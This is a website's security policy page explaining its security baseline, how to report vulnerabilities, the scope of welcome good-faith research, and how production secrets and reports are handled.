Report security concerns through the contact channel listed in security.txt.
Security is part of the default operating baseline. The site uses secure headers, environment-based configuration, request size limits, server-rendered pages, minimal JavaScript, and careful handling of rendered Markdown. The same operating mindset is intended to carry into each product in the portfolio.
Security reports can be sent to [email protected]. Please include the affected URL or product, a clear description of the issue, reproduction steps, potential impact, and any relevant screenshots or request details. Avoid including secrets, personal data, or destructive proof-of-concept payloads.
Good-faith security research is welcome when it avoids harm, data access, service disruption, persistence, social engineering, and public disclosure before the issue can be reviewed. Reports should focus on practical impact and reproducibility.
Automated scanner noise without demonstrated impact, missing headers on third-party services, denial-of-service testing, spam submissions, and issues requiring physical access or compromised user devices are generally not useful for this core website.
Admin publishing routes are protected by authentication, session cookies, and CSRF checks. Blog content is rendered from Markdown and raw HTML is disabled by default. If future product features accept untrusted rich content, rendered HTML should be sanitized before display.
Production secrets such as admin password hashes, social publishing tokens, API credentials, and email provider keys must be supplied through environment variables or a secret store. They should not be committed to source control or embedded in templates.
Security reports are reviewed based on severity, exploitability, affected systems, and user impact. Confirmed issues should be fixed, documented internally, and followed by appropriate deployment and verification steps.